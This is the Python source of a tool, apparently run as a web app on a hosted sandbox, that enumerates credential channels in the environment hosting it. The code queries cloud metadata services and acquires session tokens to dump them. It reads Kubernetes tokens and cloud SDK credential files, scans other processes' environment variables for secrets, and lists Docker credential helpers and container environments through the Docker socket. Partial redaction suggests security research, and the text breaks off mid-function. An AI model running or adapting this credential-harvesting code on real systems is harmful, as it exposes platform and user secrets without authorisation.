Spaces:
Sleeping
Sleeping
| """ | |
| Cloud Sandbox Credential Surface Probe v2 | |
| ========================================== | |
| Enumerates 9 credential storage/delivery channels in cloud sandbox environments, | |
| applies extraction techniques, and produces an actionable channel-mapped report. | |
| Credential Channels: | |
| 1. IMDS / MMDS (network endpoint) | |
| 2. ECS Container Endpoint (network endpoint) | |
| 3. IRSA / WI Projected Volume (file) | |
| 4. K8s Service Account Token (file, pivot) | |
| 5. SDK Configuration Files (file) | |
| 6. Hardcoded ENV Injection (environment variable) | |
| 7. Credential Helper (helper binary) | |
| 8. Sidecar / Reverse Proxy (out-of-sandbox) | |
| 9. UDS Proxy (socket) | |
| Extraction Techniques (orthogonal to channels): | |
| - Direct access (curl / cat / env / helper invoke) | |
| - Process environ scanning (/proc/*/environ) | |
| - Docker socket interaction (container inspect) | |
| - MMDS full dump with token acquisition | |
| """ | |
| import gradio as gr | |
| import argparse | |
| import json | |
| import os | |
| import platform | |
| import re | |
| import shutil | |
| import socket | |
| import stat as statmod | |
| import sys | |
| import time | |
| import urllib.error | |
| import urllib.parse | |
| import urllib.request | |
| # --------------------------------------------------------------------------- | |
| # Constants | |
| # --------------------------------------------------------------------------- | |
| DEFAULT_TIMEOUT = 2.5 | |
| PREVIEW_BYTES = 160 | |
| ENV_KEY_LIMIT = 60 | |
| LISTING_LIMIT = 30 | |
| SOCKET_PATH_LIMIT = 50 | |
| PROC_SAMPLE_LIMIT = 40 | |
| MMDS_TOKEN_HINT = "x-metadata-token" | |
| FIRECRACKER_SERVER_HINT = "firecracker api" | |
| ECS_RELATIVE_URI_BASE = "http://169.254.170.2" | |
| HEADER_ALLOWLIST = { | |
| "server", "content-type", "content-length", "metadata-flavor", | |
| "www-authenticate", "x-aws-ec2-metadata-token-ttl-seconds", | |
| "x-ms-version", "date", | |
| } | |
| # Metadata endpoint probes (channel 1 raw reachability) | |
| PROBES = [ | |
| {"provider": "aws", "name": "aws_root", | |
| "url": "http://169.254.169.254/", "headers": {}}, | |
| {"provider": "aws", "name": "aws_meta_root", | |
| "url": "http://169.254.169.254/latest/meta-data/", "headers": {}}, | |
| {"provider": "aws", "name": "aws_dynamic_identity", | |
| "url": "http://169.254.169.254/latest/dynamic/instance-identity/document", | |
| "headers": {}}, | |
| {"provider": "firecracker", "name": "firecracker_mmds_ssh_keys", | |
| "url": "http://169.254.169.254/latest/meta-data/managed-ssh-keys/active-keys/", | |
| "headers": {}}, | |
| {"provider": "gcp", "name": "gcp_meta_no_header", | |
| "url": "http://metadata.google.internal/computeMetadata/v1/", | |
| "headers": {}}, | |
| {"provider": "gcp", "name": "gcp_meta_with_header", | |
| "url": "http://metadata.google.internal/computeMetadata/v1/", | |
| "headers": {"Metadata-Flavor": "Google"}}, | |
| {"provider": "azure", "name": "azure_meta_no_header", | |
| "url": "http://169.254.169.254/metadata/instance?api-version=2021-02-01", | |
| "headers": {}}, | |
| {"provider": "azure", "name": "azure_meta_with_header", | |
| "url": "http://169.254.169.254/metadata/instance?api-version=2021-02-01", | |
| "headers": {"Metadata": "true"}}, | |
| {"provider": "aliyun", "name": "aliyun_meta_root", | |
| "url": "http://100.100.100.200/latest/meta-data/", "headers": {}}, | |
| {"provider": "digitalocean", "name": "digitalocean_meta_root", | |
| "url": "http://169.254.169.254/metadata/v1/", "headers": {}}, | |
| {"provider": "oci", "name": "oci_meta_no_header", | |
| "url": "http://169.254.169.254/opc/v2/", "headers": {}}, | |
| {"provider": "oci", "name": "oci_meta_with_header", | |
| "url": "http://169.254.169.254/opc/v2/", | |
| "headers": {"Authorization": "Bearer Oracle"}}, | |
| ] | |
| # MMDS / IMDSv2 token acquisition attempts | |
| MMDS_TOKEN_PROBES = [ | |
| {"name": "imdsv2_put_token", "method": "PUT", | |
| "url": "http://169.254.169.254/latest/api/token", | |
| "headers": {"X-metadata-token-ttl-seconds": "21600"}}, | |
| {"name": "mmds_put_token", "method": "PUT", | |
| "url": "http://169.254.169.254/latest/meta-data/mmds/token", | |
| "headers": {"X-metadata-token-ttl-seconds": "300"}}, | |
| ] | |
| # Env patterns for interesting key detection | |
| INTERESTING_ENV_PATTERNS = [ | |
| "AWS_", "AZURE_", "GCP", "GOOGLE_", "KUBERNETES", "KUBE_", | |
| "ECS", "EC2", "CONTAINER", "DOCKER", "POD", "CI", | |
| "GITHUB_", "GITLAB_", "CODESPACES", "DEVCONTAINER", | |
| "FIRECRACKER", "MMDS", | |
| "CSB", "CODESANDBOX", "PITCHER", "SANDBOX", | |
| "RAILWAY", "FLY_", "RENDER_", "REPLIT_", "GITPOD_", | |
| "TOKEN", "SECRET", "KEY", "CRED", "AUTH", "PASS", | |
| ] | |
| # Regex for sensitive values in /proc/*/environ | |
| SENSITIVE_ENVIRON_RE = re.compile( | |
| r'(AKIA[0-9A-Z]{16}' | |
| r'|(?:SECRET|TOKEN|KEY|PASS|CRED|AUTH|MMDS|PITCHER|CSB|CODESANDBOX|SANDBOX)' | |
| r'|(?:eyJ[A-Za-z0-9_-]{10,})' | |
| r')', | |
| re.IGNORECASE, | |
| ) | |
| ECS_ENV_KEYS = [ | |
| "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI", | |
| "AWS_CONTAINER_CREDENTIALS_FULL_URI", | |
| ] | |
| SDK_PATHS = [ | |
| "~/.aws/credentials", "~/.aws/config", | |
| "~/.config/gcloud/application_default_credentials.json", | |
| "~/.config/gcloud/access_tokens.db", | |
| "~/.azure", | |
| ] | |
| FILE_PREVIEW_PATHS = [ | |
| "/proc/1/cgroup", "/proc/self/cgroup", "/proc/1/cmdline", | |
| "/etc/hostname", "/etc/resolv.conf", | |
| "/sys/class/dmi/id/product_name", "/sys/class/dmi/id/product_version", | |
| "/sys/class/dmi/id/sys_vendor", "/sys/class/dmi/id/board_vendor", | |
| "/sys/hypervisor/uuid", | |
| ] | |
| FILE_STAT_PATHS = [ | |
| "/.dockerenv", "/run/.containerenv", | |
| "/var/lib/cloud/instance/cloud-config.txt", "/etc/cloud/cloud.cfg", | |
| "/var/run/secrets/kubernetes.io/serviceaccount/token", | |
| "/var/run/secrets/kubernetes.io/serviceaccount/namespace", | |
| ] | |
| DIRECTORY_LIST_PATHS = ["/var/lib/cloud", "/var/run/secrets", "/run", "/tmp"] | |
| PODMAN_ARTIFACT_PATHS = ["/run/containers", "/run/libpod", "/run/crun"] | |
| # --------------------------------------------------------------------------- | |
| # Utility helpers | |
| # --------------------------------------------------------------------------- | |
| def normalize_path(path): | |
| if os.name == "nt" and path.startswith("/"): | |
| return path.replace("/", "\\") | |
| return path | |
| def sanitize_preview(text, limit=PREVIEW_BYTES): | |
| return re.sub(r"\s+", " ", text.replace("\r", " "))[:limit] | |
| def redact_value(value, keep=12): | |
| if len(value) <= keep: | |
| return value | |
| return value[:keep] + f"...({len(value)} chars)" | |
| def filter_headers(headers): | |
| return {k: v for k, v in headers.items() if k.lower() in HEADER_ALLOWLIST} | |
| def get_header_value(headers, key): | |
| for k, v in headers.items(): | |
| if k.lower() == key.lower(): | |
| return v | |
| return None | |
| # --------------------------------------------------------------------------- | |
| # Low-level I/O | |
| # --------------------------------------------------------------------------- | |
| def stat_path(path): | |
| target = normalize_path(path) | |
| info = {"path": path, "exists": False, "readable": False} | |
| try: | |
| st = os.stat(target) | |
| info["exists"] = True | |
| info["size"] = st.st_size | |
| info["is_dir"] = os.path.isdir(target) | |
| except Exception as exc: | |
| info["error"] = f"{type(exc).__name__}: {exc}" | |
| return info | |
| try: | |
| with open(target, "rb"): | |
| info["readable"] = True | |
| except Exception: | |
| if info.get("is_dir"): | |
| info["readable"] = True | |
| return info | |
| def read_preview(path, limit=PREVIEW_BYTES): | |
| target = normalize_path(path) | |
| result = {"path": path, "exists": False, "readable": False} | |
| try: | |
| with open(target, "rb") as fh: | |
| result["exists"] = True | |
| result["readable"] = True | |
| body = fh.read(limit).decode("utf-8", errors="replace") | |
| result["preview"] = sanitize_preview(body, limit) | |
| except FileNotFoundError: | |
| result["error"] = "FileNotFoundError" | |
| except Exception as exc: | |
| result["exists"] = os.path.exists(target) | |
| result["error"] = f"{type(exc).__name__}: {exc}" | |
| return result | |
| def read_full(path, limit=65536): | |
| """Read file fully up to *limit* bytes, return raw bytes or None.""" | |
| target = normalize_path(path) | |
| try: | |
| with open(target, "rb") as fh: | |
| return fh.read(limit) | |
| except Exception: | |
| return None | |
| def list_directory(path, limit=LISTING_LIMIT): | |
| target = normalize_path(path) | |
| result = {"path": path, "exists": False, "readable": False} | |
| try: | |
| entries = sorted(os.listdir(target)) | |
| result.update(exists=True, readable=True, | |
| entries=entries[:limit], entry_count=len(entries)) | |
| except FileNotFoundError: | |
| result["error"] = "FileNotFoundError" | |
| except Exception as exc: | |
| result["exists"] = os.path.exists(target) | |
| result["error"] = f"{type(exc).__name__}: {exc}" | |
| return result | |
| def find_socket_files(limit=SOCKET_PATH_LIMIT): | |
| if os.name == "nt": | |
| return [] | |
| findings = [] | |
| for root in ["/run", "/var/run", "/tmp", "/project", "/workspace"]: | |
| target = normalize_path(root) | |
| if not os.path.isdir(target): | |
| continue | |
| for cr, _, files in os.walk(target): | |
| for fn in files: | |
| fp = os.path.join(cr, fn) | |
| try: | |
| if statmod.S_ISSOCK(os.stat(fp).st_mode): | |
| findings.append(fp) | |
| if len(findings) >= limit: | |
| return findings | |
| except Exception: | |
| continue | |
| return findings | |
| # --------------------------------------------------------------------------- | |
| # HTTP helpers | |
| # --------------------------------------------------------------------------- | |
| def http_get(url, headers=None, timeout=DEFAULT_TIMEOUT, method="GET", | |
| data=None, read_limit=PREVIEW_BYTES): | |
| """Generic HTTP request, returns dict with status/body/headers/error.""" | |
| hdrs = headers or {} | |
| started = time.time() | |
| req = urllib.request.Request(url, headers=hdrs, method=method, data=data) | |
| try: | |
| with urllib.request.urlopen(req, timeout=timeout) as resp: | |
| body = resp.read(read_limit).decode("utf-8", errors="replace") | |
| return { | |
| "status": resp.status, "ok": True, | |
| "latency_ms": round((time.time() - started) * 1000, 2), | |
| "headers": filter_headers(resp.headers), | |
| "body": body, | |
| } | |
| except urllib.error.HTTPError as exc: | |
| preview = None | |
| try: | |
| preview = exc.read(read_limit).decode("utf-8", errors="replace") | |
| except Exception: | |
| pass | |
| return { | |
| "status": exc.code, "ok": False, | |
| "latency_ms": round((time.time() - started) * 1000, 2), | |
| "headers": filter_headers(exc.headers), | |
| "error": str(exc.reason), "body": preview, | |
| } | |
| except urllib.error.URLError as exc: | |
| reason = exc.reason | |
| msg = "timeout" if isinstance(reason, socket.timeout) else f"{type(reason).__name__}: {reason}" | |
| return {"status": None, "ok": False, | |
| "latency_ms": round((time.time() - started) * 1000, 2), | |
| "error": msg} | |
| except socket.timeout: | |
| return {"status": None, "ok": False, | |
| "latency_ms": round((time.time() - started) * 1000, 2), | |
| "error": "timeout"} | |
| except Exception as exc: | |
| return {"status": None, "ok": False, | |
| "latency_ms": round((time.time() - started) * 1000, 2), | |
| "error": f"{type(exc).__name__}: {exc}"} | |
| def uds_http_get(socket_path, http_path, timeout=5, recv_limit=65536): | |
| """HTTP GET over Unix Domain Socket. Returns response body string.""" | |
| s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) | |
| s.settimeout(timeout) | |
| s.connect(socket_path) | |
| req = f"GET {http_path} HTTP/1.0\r\nHost: localhost\r\n\r\n" | |
| s.sendall(req.encode()) | |
| chunks = [] | |
| while True: | |
| chunk = s.recv(recv_limit) | |
| if not chunk: | |
| break | |
| chunks.append(chunk) | |
| s.close() | |
| raw = b"".join(chunks).decode("utf-8", errors="replace") | |
| if "\r\n\r\n" in raw: | |
| _, body = raw.split("\r\n\r\n", 1) | |
| return body | |
| return raw | |
| def uds_send_json(socket_path, payload, timeout=3, recv_limit=4096): | |
| """Send JSON over Unix Domain Socket, return response string.""" | |
| s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) | |
| s.settimeout(timeout) | |
| s.connect(socket_path) | |
| s.sendall((json.dumps(payload) + "\n").encode()) | |
| resp = s.recv(recv_limit).decode("utf-8", errors="replace") | |
| s.close() | |
| return resp | |
| # --------------------------------------------------------------------------- | |
| # Runtime fingerprinting | |
| # --------------------------------------------------------------------------- | |
| def get_runtime(): | |
| return { | |
| "hostname": socket.gethostname(), | |
| "platform": platform.platform(), | |
| "python_version": platform.python_version(), | |
| "pid": os.getpid(), | |
| "uid": os.getuid() if hasattr(os, "getuid") else None, | |
| "cwd": os.getcwd(), | |
| "argv": sys.argv, | |
| "env_key_count": len(os.environ), | |
| } | |
| def collect_runtime_context(): | |
| """Filesystem / cgroup / marker fingerprints to characterise the sandbox.""" | |
| return { | |
| "file_previews": [read_preview(p) for p in FILE_PREVIEW_PATHS], | |
| "file_stats": [stat_path(p) for p in FILE_STAT_PATHS], | |
| "directory_samples": [list_directory(p) for p in DIRECTORY_LIST_PATHS], | |
| "interesting_env_keys": _collect_env_keys(), | |
| } | |
| def _collect_env_keys(): | |
| matches = [] | |
| for key in sorted(os.environ): | |
| upper = key.upper() | |
| if any(pat in upper for pat in INTERESTING_ENV_PATTERNS): | |
| matches.append(key) | |
| return matches[:ENV_KEY_LIMIT] | |
| # --------------------------------------------------------------------------- | |
| # Channel 1 – IMDS / MMDS | |
| # --------------------------------------------------------------------------- | |
| def _is_firecracker_gated(item): | |
| if item.get("status") != 401: | |
| return False | |
| srv = get_header_value(item.get("headers", {}), "server") or "" | |
| body = (item.get("body") or item.get("preview") or "").lower() | |
| return FIRECRACKER_SERVER_HINT in srv.lower() and MMDS_TOKEN_HINT in body | |
| def probe_metadata_endpoints(timeout): | |
| results = [] | |
| for p in PROBES: | |
| r = http_get(p["url"], headers=p["headers"], timeout=timeout, | |
| read_limit=PREVIEW_BYTES) | |
| r["provider"] = p["provider"] | |
| r["name"] = p["name"] | |
| r["url"] = p["url"] | |
| results.append(r) | |
| return results | |
| def try_acquire_mmds_token(timeout): | |
| """Attempt IMDSv2 PUT and variants to obtain a session token.""" | |
| results = [] | |
| for tp in MMDS_TOKEN_PROBES: | |
| r = http_get(tp["url"], headers=tp["headers"], method=tp["method"], | |
| data=b"", timeout=timeout, read_limit=256) | |
| entry = { | |
| "name": tp["name"], | |
| "status": r.get("status"), | |
| "ok": r.get("ok", False), | |
| "latency_ms": r.get("latency_ms"), | |
| } | |
| if r.get("ok") and r.get("body"): | |
| token = r["body"].strip() | |
| entry["token_length"] = len(token) | |
| entry["token_preview"] = token | |
| if r.get("error"): | |
| entry["error"] = r["error"] | |
| results.append(entry) | |
| return results | |
| def dump_mmds_full(token, timeout=5): | |
| """Fetch the entire MMDS tree and decode additional_files byte arrays.""" | |
| result = {"token_ok": False, "raw_size": 0} | |
| r = http_get("http://169.254.169.254/", | |
| headers={"X-metadata-token": token, | |
| "Accept": "application/json"}, | |
| timeout=timeout, read_limit=262144) # 256 KB | |
| if not r.get("ok"): | |
| result["error"] = r.get("error", f"status={r.get('status')}") | |
| return result | |
| body = r.get("body", "") | |
| result["token_ok"] = True | |
| result["raw_size"] = len(body) | |
| try: | |
| tree = json.loads(body) | |
| except json.JSONDecodeError: | |
| result["tree_raw_preview"] = sanitize_preview(body, 2048) | |
| return result | |
| # Walk the tree and collect all leaf keys (redacted values) | |
| key_inventory = [] | |
| _walk_keys(tree, "", key_inventory, depth=0) | |
| result["key_inventory"] = key_inventory | |
| # Decode additional_files byte arrays | |
| decoded_files = {} | |
| try: | |
| additional = tree.get("latest", {}).get("additional_files", {}) | |
| if not additional: | |
| # Try other common structures | |
| for top_key in tree: | |
| sub = tree[top_key] | |
| if isinstance(sub, dict) and "additional_files" in sub: | |
| additional = sub["additional_files"] | |
| break | |
| for fpath, fobj in additional.items(): | |
| content = fobj if isinstance(fobj, list) else fobj.get("content", []) if isinstance(fobj, dict) else [] | |
| if isinstance(content, list): | |
| raw_text = bytes(content).decode("utf-8", errors="replace") | |
| lines = raw_text.split("\n") | |
| redacted = [] | |
| for line in lines: | |
| if "=" in line: | |
| k, _, v = line.partition("=") | |
| redacted.append(f"{k}={redact_value(v, 16)}") | |
| elif line.strip(): | |
| redacted.append(redact_value(line, 40)) | |
| decoded_files[fpath] = { | |
| "line_count": len(lines), | |
| "raw_length": len(raw_text), | |
| "content_redacted": "\n".join(redacted), | |
| } | |
| except Exception as exc: | |
| decoded_files["_error"] = f"{type(exc).__name__}: {exc}" | |
| result["decoded_files"] = decoded_files | |
| return result | |
| def _walk_keys(obj, prefix, acc, depth=0, max_depth=6): | |
| if depth > max_depth: | |
| return | |
| if isinstance(obj, dict): | |
| for k, v in obj.items(): | |
| full = f"{prefix}/{k}" if prefix else k | |
| if isinstance(v, (dict, list)): | |
| _walk_keys(v, full, acc, depth + 1, max_depth) | |
| else: | |
| val_str = str(v) | |
| acc.append({"key": full, "type": type(v).__name__, | |
| "value_preview": redact_value(val_str, 20)}) | |
| elif isinstance(obj, list) and len(obj) < 200: | |
| acc.append({"key": prefix, "type": "list", | |
| "value_preview": f"[{len(obj)} items]"}) | |
| def collect_channel_1(timeout): | |
| """Channel 1: IMDS / MMDS – probe, acquire token, dump.""" | |
| probes = probe_metadata_endpoints(timeout) | |
| token_attempts = try_acquire_mmds_token(timeout) | |
| mmds_dump = None | |
| acquired_token = None | |
| for t in token_attempts: | |
| if t.get("ok") and t.get("token_length", 0) > 0: | |
| # Reconstruct full token – re-fetch | |
| r = http_get(MMDS_TOKEN_PROBES[0]["url"], | |
| headers=MMDS_TOKEN_PROBES[0]["headers"], | |
| method="PUT", data=b"", timeout=timeout, | |
| read_limit=512) | |
| if r.get("ok"): | |
| acquired_token = r["body"].strip() | |
| break | |
| if acquired_token: | |
| mmds_dump = dump_mmds_full(acquired_token, timeout=max(timeout, 5)) | |
| # Classify probes | |
| reachable, gated, mmds_gated, blocked = [], [], [], [] | |
| for item in probes: | |
| if item.get("status") == 200: | |
| reachable.append(item["name"]) | |
| elif _is_firecracker_gated(item): | |
| mmds_gated.append(item["name"]) | |
| else: | |
| blocked.append(item["name"]) | |
| status = "open" | |
| if reachable: | |
| status = "directly_reachable" | |
| elif acquired_token and mmds_dump and mmds_dump.get("token_ok"): | |
| status = "token_gate_bypassed" | |
| elif mmds_gated: | |
| status = "token_gated" | |
| elif blocked: | |
| status = "blocked" | |
| return { | |
| "status": status, | |
| "probes": probes, | |
| "token_attempts": token_attempts, | |
| "mmds_dump": mmds_dump, | |
| "directly_reachable": reachable, | |
| "mmds_token_gated": mmds_gated, | |
| "blocked": blocked, | |
| } | |
| # --------------------------------------------------------------------------- | |
| # Channel 2 – ECS Container Credential Endpoint | |
| # --------------------------------------------------------------------------- | |
| def collect_channel_2(timeout): | |
| entries = [] | |
| for key in ECS_ENV_KEYS: | |
| val = os.environ.get(key) | |
| if not val: | |
| continue | |
| url = f"{ECS_RELATIVE_URI_BASE}{val}" if key.endswith("RELATIVE_URI") else val | |
| r = http_get(url, timeout=timeout, read_limit=512) | |
| entries.append({ | |
| "env_key": key, "url_redacted": redact_value(url, 30), | |
| "status": r.get("status"), "ok": r.get("ok", False), | |
| "body_preview": redact_value(r.get("body", ""), 40) if r.get("body") else None, | |
| "error": r.get("error"), | |
| }) | |
| return { | |
| "status": "detected" if any(e["ok"] for e in entries) else ( | |
| "env_present" if entries else "not_found"), | |
| "entries": entries, | |
| } | |
| # --------------------------------------------------------------------------- | |
| # Channel 3 – IRSA / Workload Identity projected volumes | |
| # --------------------------------------------------------------------------- | |
| def collect_channel_3(): | |
| pointers = [] | |
| for env_key in ("AWS_WEB_IDENTITY_TOKEN_FILE", | |
| "GOOGLE_APPLICATION_CREDENTIALS", | |
| "AZURE_CLIENT_CERTIFICATE_PATH"): | |
| val = os.environ.get(env_key) | |
| if not val: | |
| continue | |
| info = stat_path(val) | |
| entry = {"env_key": env_key, "path": val, **info} | |
| if info.get("readable"): | |
| preview = read_preview(val, limit=240) | |
| entry["content_preview"] = redact_value( | |
| preview.get("preview", ""), 40) | |
| entry["jwt_like"] = preview.get("preview", "").count(".") >= 2 | |
| pointers.append(entry) | |
| return { | |
| "status": "detected" if pointers else "not_found", | |
| "pointers": pointers, | |
| } | |
| # --------------------------------------------------------------------------- | |
| # Channel 4 – Kubernetes Service Account Token | |
| # --------------------------------------------------------------------------- | |
| def collect_channel_4(): | |
| token_path = "/var/run/secrets/kubernetes.io/serviceaccount/token" | |
| ns_path = "/var/run/secrets/kubernetes.io/serviceaccount/namespace" | |
| token_info = stat_path(token_path) | |
| result = {"status": "not_found", "token": token_info} | |
| if token_info.get("exists") and token_info.get("readable"): | |
| preview = read_preview(token_path, limit=300) | |
| raw = preview.get("preview", "") | |
| result["status"] = "detected" | |
| result["jwt_like"] = raw.count(".") >= 2 | |
| result["content_preview"] = redact_value(raw, 30) | |
| ns_info = read_preview(ns_path, limit=100) | |
| if ns_info.get("readable"): | |
| result["namespace"] = ns_info.get("preview", "").strip() | |
| return result | |
| # --------------------------------------------------------------------------- | |
| # Channel 5 – SDK configuration files | |
| # --------------------------------------------------------------------------- | |
| def collect_channel_5(): | |
| found = [] | |
| for raw_path in SDK_PATHS: | |
| expanded = os.path.expanduser(raw_path) | |
| info = stat_path(expanded) | |
| if info.get("exists"): | |
| entry = {"path": expanded, **info} | |
| if info.get("readable") and not info.get("is_dir"): | |
| p = read_preview(expanded, limit=512) | |
| entry["content_preview"] = redact_value( | |
| p.get("preview", ""), 60) | |
| found.append(entry) | |
| # Also try /home/*/.aws etc | |
| for home_base in ["/home", "/root"]: | |
| for sub in [".aws/credentials", ".aws/config", | |
| ".config/gcloud/application_default_credentials.json"]: | |
| candidate = os.path.join(home_base, sub) | |
| if candidate == os.path.expanduser(f"~/{sub}"): | |
| continue | |
| info = stat_path(candidate) | |
| if info.get("exists"): | |
| found.append({"path": candidate, **info}) | |
| return { | |
| "status": "detected" if found else "not_found", | |
| "files": found, | |
| } | |
| # --------------------------------------------------------------------------- | |
| # Channel 6 – Hardcoded ENV injection | |
| # --------------------------------------------------------------------------- | |
| def collect_channel_6(): | |
| """Scan current process env AND /proc/*/environ for sensitive vars.""" | |
| # Current process | |
| current_env = [] | |
| for key in sorted(os.environ): | |
| upper = key.upper() | |
| if any(pat in upper for pat in INTERESTING_ENV_PATTERNS): | |
| current_env.append({ | |
| "key": key, | |
| "value_preview": redact_value(os.environ[key], 16), | |
| "value_length": len(os.environ[key]), | |
| }) | |
| # Cross-process scan | |
| cross_process = _scan_proc_environ() | |
| return { | |
| "status": "detected" if (current_env or cross_process["findings"]) else "not_found", | |
| "current_process_interesting_count": len(current_env), | |
| "current_process": current_env[:ENV_KEY_LIMIT], | |
| "cross_process": cross_process, | |
| } | |
| def _scan_proc_environ(): | |
| proc_root = normalize_path("/proc") | |
| if not os.path.isdir(proc_root): | |
| return {"supported": False, "findings": []} | |
| findings = [] | |
| seen_keys = set() | |
| pids_sampled = 0 | |
| pids_readable = 0 | |
| for entry in sorted(os.listdir(proc_root)): | |
| if not entry.isdigit(): | |
| continue | |
| if pids_sampled >= PROC_SAMPLE_LIMIT: | |
| break | |
| pids_sampled += 1 | |
| environ_path = os.path.join(proc_root, entry, "environ") | |
| try: | |
| with open(environ_path, "rb") as fh: | |
| raw = fh.read(16384) | |
| pids_readable += 1 | |
| except Exception: | |
| continue | |
| for pair in raw.split(b'\x00'): | |
| try: | |
| decoded = pair.decode("utf-8", errors="replace") | |
| except Exception: | |
| continue | |
| if '=' not in decoded: | |
| continue | |
| key, _, value = decoded.partition('=') | |
| if key in seen_keys: | |
| continue | |
| if SENSITIVE_ENVIRON_RE.search(key) or SENSITIVE_ENVIRON_RE.search(value): | |
| seen_keys.add(key) | |
| findings.append({ | |
| "pid": entry, "key": key, | |
| "value_preview": redact_value(value, 12), | |
| "value_length": len(value), | |
| }) | |
| return { | |
| "supported": True, | |
| "pids_sampled": pids_sampled, | |
| "pids_readable": pids_readable, | |
| "finding_count": len(findings), | |
| "findings": findings, | |
| } | |
| # --------------------------------------------------------------------------- | |
| # Channel 7 – Docker Credential Helper | |
| # --------------------------------------------------------------------------- | |
| def collect_channel_7(): | |
| # Search multiple possible config locations | |
| candidates = [ | |
| os.path.expanduser("~/.docker/config.json"), | |
| "/root/.docker/config.json", | |
| "/home/*/.docker/config.json", | |
| ] | |
| config_found = None | |
| for c in candidates: | |
| if "*" in c: | |
| import glob | |
| for match in glob.glob(c): | |
| if os.path.isfile(match): | |
| config_found = match | |
| break | |
| elif os.path.isfile(c): | |
| config_found = c | |
| break | |
| result = {"status": "not_found", "config_path": config_found, "helpers": []} | |
| if not config_found: | |
| return result | |
| try: | |
| with open(config_found, "r", encoding="utf-8") as fh: | |
| data = json.load(fh) | |
| except Exception as exc: | |
| result["error"] = f"{type(exc).__name__}: {exc}" | |
| return result | |
| helper_names = [] | |
| if isinstance(data.get("credsStore"), str): | |
| helper_names.append(data["credsStore"]) | |
| cred_helpers = data.get("credHelpers", {}) | |
| if isinstance(cred_helpers, dict): | |
| helper_names.extend(v for v in cred_helpers.values() if isinstance(v, str)) | |
| for name in sorted(set(helper_names)): | |
| bin_name = f"docker-credential-{name}" | |
| found = bool(shutil.which(bin_name)) | |
| entry = {"name": name, "binary": bin_name, "binary_found": found} | |
| # Try invoking list | |
| if found: | |
| entry["list_result"] = _try_helper_list(bin_name) | |
| result["helpers"].append(entry) | |
| # Also check for the binary even without config | |
| for bin_name in ["docker-credential-secret", "docker-credential-ecr-login", | |
| "docker-credential-gcloud", "docker-credential-helper"]: | |
| if shutil.which(bin_name) and bin_name not in [h["binary"] for h in result["helpers"]]: | |
| entry = {"name": bin_name.replace("docker-credential-", ""), | |
| "binary": bin_name, "binary_found": True, | |
| "note": "found_in_PATH_without_config"} | |
| entry["list_result"] = _try_helper_list(bin_name) | |
| result["helpers"].append(entry) | |
| result["status"] = "detected" if result["helpers"] else "not_found" | |
| return result | |
| def _try_helper_list(bin_name): | |
| """Try echo '' | docker-credential-xxx list""" | |
| import subprocess | |
| try: | |
| proc = subprocess.run( | |
| [bin_name, "list"], | |
| input=b"", capture_output=True, timeout=5, | |
| ) | |
| out = proc.stdout.decode("utf-8", errors="replace")[:512] | |
| err = proc.stderr.decode("utf-8", errors="replace")[:256] | |
| return { | |
| "returncode": proc.returncode, | |
| "stdout_preview": redact_value(out, 80), | |
| "stderr_preview": redact_value(err, 80) if err else None, | |
| } | |
| except FileNotFoundError: | |
| return {"error": "binary_not_found"} | |
| except Exception as exc: | |
| return {"error": f"{type(exc).__name__}: {exc}"} | |
| # --------------------------------------------------------------------------- | |
| # Channel 8 – Sidecar / Reverse Proxy (detection by absence) | |
| # --------------------------------------------------------------------------- | |
| def collect_channel_8(): | |
| """Infer sidecar presence by checking for proxy env vars and iptables.""" | |
| indicators = [] | |
| for key in ("HTTP_PROXY", "HTTPS_PROXY", "http_proxy", "https_proxy", | |
| "NO_PROXY", "no_proxy"): | |
| val = os.environ.get(key) | |
| if val: | |
| indicators.append({"type": "proxy_env", "key": key, | |
| "value_preview": redact_value(val, 30)}) | |
| # Check if iptables has NAT rules redirecting outbound traffic | |
| import subprocess | |
| try: | |
| proc = subprocess.run( | |
| ["iptables", "-t", "nat", "-L", "-n"], | |
| capture_output=True, timeout=5, | |
| ) | |
| out = proc.stdout.decode("utf-8", errors="replace") | |
| if "REDIRECT" in out or "DNAT" in out: | |
| indicators.append({"type": "iptables_redirect", | |
| "preview": redact_value(out, 120)}) | |
| except Exception: | |
| pass | |
| return { | |
| "status": "possible" if indicators else "not_observed", | |
| "indicators": indicators, | |
| } | |
| # --------------------------------------------------------------------------- | |
| # Channel 9 – UDS Proxy | |
| # --------------------------------------------------------------------------- | |
| def collect_channel_9(timeout): | |
| """Enumerate Unix domain sockets and probe high-value ones.""" | |
| socket_files = find_socket_files() | |
| # Classify | |
| docker_socks = [s for s in socket_files if "docker.sock" in s] | |
| pitcher_socks = [s for s in socket_files if "pitcher" in s] | |
| git_socks = [s for s in socket_files if "git" in s and s.endswith(".sock")] | |
| vscode_socks = [s for s in socket_files if "vscode" in s] | |
| other_socks = [s for s in socket_files | |
| if s not in docker_socks + pitcher_socks + git_socks + vscode_socks] | |
| # Probe docker socket | |
| docker_probe = None | |
| if docker_socks: | |
| docker_probe = _probe_docker_socket(docker_socks[0]) | |
| # Probe pitcher socket | |
| pitcher_probe = None | |
| if pitcher_socks: | |
| pitcher_probe = _probe_pitcher_socket(pitcher_socks[0]) | |
| return { | |
| "status": "detected" if socket_files else "not_found", | |
| "total_count": len(socket_files), | |
| "docker_sockets": docker_socks, | |
| "pitcher_sockets": pitcher_socks, | |
| "git_sockets": git_socks, | |
| "vscode_sockets": vscode_socks, | |
| "other_sockets": other_socks, | |
| "docker_probe": docker_probe, | |
| "pitcher_probe": pitcher_probe, | |
| } | |
| def _probe_docker_socket(sock_path): | |
| """Interact with Docker daemon via UDS: list containers, inspect, images.""" | |
| result = {"socket_path": sock_path, "accessible": False} | |
| if not os.path.exists(sock_path): | |
| result["error"] = "not_found" | |
| return result | |
| try: | |
| # List containers | |
| raw = uds_http_get(sock_path, "/containers/json?all=true") | |
| containers = json.loads(raw) | |
| result["accessible"] = True | |
| result["container_count"] = len(containers) | |
| result["containers"] = [] | |
| for c in containers[:10]: | |
| cid = c.get("Id", "")[:12] | |
| entry = { | |
| "id_short": cid, | |
| "image": c.get("Image", ""), | |
| "state": c.get("State", ""), | |
| "names": c.get("Names", []), | |
| } | |
| # Inspect each container for ENV and Mounts | |
| try: | |
| inspect_raw = uds_http_get(sock_path, | |
| f"/containers/{cid}/json") | |
| inspect = json.loads(inspect_raw) | |
| env_list = inspect.get("Config", {}).get("Env", []) | |
| entry["env"] = [] | |
| for e in env_list: | |
| if "=" in e: | |
| k, _, v = e.partition("=") | |
| entry["env"].append(f"{k}={redact_value(v, 16)}") | |
